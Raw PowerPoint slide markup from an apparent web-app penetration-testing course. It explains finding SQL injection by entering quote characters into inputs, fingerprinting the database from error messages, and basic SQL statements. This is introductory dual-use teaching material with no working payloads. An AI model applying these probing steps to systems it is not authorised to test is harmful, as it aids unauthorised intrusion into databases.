          <p:cNvPr id="123907" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1691640"/>
            <a:ext cx="8168640" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look for input points in the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Don't forget cookies, headers and all of the inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Focus on data related input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any input that appears to be used in database calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Search strings and logins are two examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enter a '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application errors, it may be vulnerable to SQL injection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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203835" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Why Python for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web App Pen Testers?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106680" y="1691640"/>
            <a:ext cx="8915400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python is a simple language to understand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very readable language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Even if we are unfamiliar with the language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Core libraries support HTTP handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requests, responses, and common data structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are able to modify, change, or update many existing tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3344659948"/>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a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fingerprinting the DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1508760"/>
            <a:ext cx="8077200" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Error messages are the key to determining the database type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some error messages are specific to a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look for driver names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The type of DB guides our attack since the RDBMS systems have differences in their SQL syntax</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spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Error Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259080" y="1508760"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that the error message we find will depend on the backend database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Examples of database errors messages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ORA-01756: quoted string not properly terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Incorrect Syntax near '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You have an error in your SQL syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determining the database type is important as we move into exploitation</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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Important Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198120" y="1691640"/>
            <a:ext cx="8763000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL does have some standard commands we need to know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>select to retrieve records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>tblUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>insert to add records to a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>insert into "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>tblUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) values ("Kevin", "4038024");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>update to modify existing records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>tblUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> = "9044038024" where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>chrName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> = "Kevin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL also includes modifiers such as WHERE, AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WHERE adds conditions to our query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AND/OR allow us to expand the conditions</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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovering SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovering SQL injection is similar to any flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Find various inputs in the application and add special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Single quotes (') and double quotes (")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then examine the results for database errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind they may be in the HTML source</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a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335280" y="1510665"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual discovery simply means playing with each input as we use the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is a slow means of finding issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But it gets to be as thorough as we want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many different tools are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The great hacking tool IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, Opera, Safari of course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
